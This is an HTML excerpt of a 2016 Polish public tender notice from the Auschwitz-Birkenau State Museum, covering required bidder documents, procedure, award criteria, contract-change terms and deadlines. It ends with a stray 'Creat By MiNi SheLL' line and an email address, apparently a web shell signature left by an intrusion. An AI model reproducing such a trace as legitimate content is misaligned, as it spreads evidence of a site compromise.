<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a.	Formularz ofertowy - Załącznik nr 4 do SIWZ.
b.	Oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone wg wzoru stanowiącego Załącznik nr 5 do SIWZ.
c.	Kopia dowodu wniesienia wadium. Oryginał wadium wniesionego w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, w gwarancjach bankowych, w gwarancjach ubezpieczeniowych lub w poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2  ustawy z dn. 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.) - należy dołączyć w osobnej, odpowiednio oznaczonej kopercie.
d.	Pełnomocnictwo (jeśli dotyczy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której został dokonany wybór Wykonawcy.
1.	Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian  zawartej umowy:
a) W przypadku konieczności przedłużenia terminu umownego z powodu:
1)	udzielenia przez Zamawiającego zamówień dodatkowych lub uzupełniających, o których mowa w art. 67 Ustawy Prawo zamówień publicznych, których realizacja będzie miała wpływ na realizację zakresu zamówienia podstawowego
2)	wystąpienia konieczności wykonania dodatkowych badań konserwatorskich, których prowadzenie oraz wyniki wpływają na termin realizacji
3)	działania siły wyższej, tj. wyjątkowego i nagłego zdarzenia lub okoliczności, którego nie można było wcześniej przewidzieć
4)	z przyczyn zależnych od Zamawiającego
5)	ujawnienia się w trakcie realizacji przedmiotu zamówienia nieznanych wcześniej przeszkód wstrzymujących dalszą realizację przedmiotu zamówienia
6)	konieczności wykonania przez Wykonawcę  dokumentacji zamiennej
7)	konieczności wykonania prac i robót dodatkowych, których nie można było przewidzieć w chwili zawarcia umowy związanych z potrzebą usunięcia skutków błędów projektowych lub wykonawczych.
8)	Konieczność przerw w wyniku delegacji rządowych i uroczystości na terenie Muzeum.
b) W przypadkach zmian danych podmiotowych Wykonawcy, zmian przedstawicieli Zamawiającego i/lub Wykonawcy.
3. W przypadku żądania przedłużenia terminu umownego przez Wykonawcę, zostanie przeprowadzona następująca procedura:
a) Wykonawca prześle Zamawiającemu projekt zmian do umowy (aneks) w terminie, co najmniej 14 dni przed datą upływu terminu zakończenia umowy wraz z pisemnym uzasadnieniem
b) Zamawiający udzieli pisemnej odpowiedzi lub odeśle podpisany aneks do umowy przed upływem terminu wykonania umowy. 
4. Warunkiem dokonania zmian postanowień umowy jest zgoda obu stron wyrażona na piśmie pod rygorem nieważności takiej zmiany w formie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ww.auschwitz.org<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PAŃSTWOWE MUZEUM AUSCHWITZ-BIRKENAU w Oświęcimiu, ul. Więźniów Oświęcimia 20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2016 godzina 12:00, miejsce: PAŃSTWOWE MUZEUM AUSCHWITZ-BIRKENAU w Oświęcimiu, ul. Więźniów Oświęcimia 20, budynek administracyjny, Dziennik podawczy (pokój nr 1.8)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com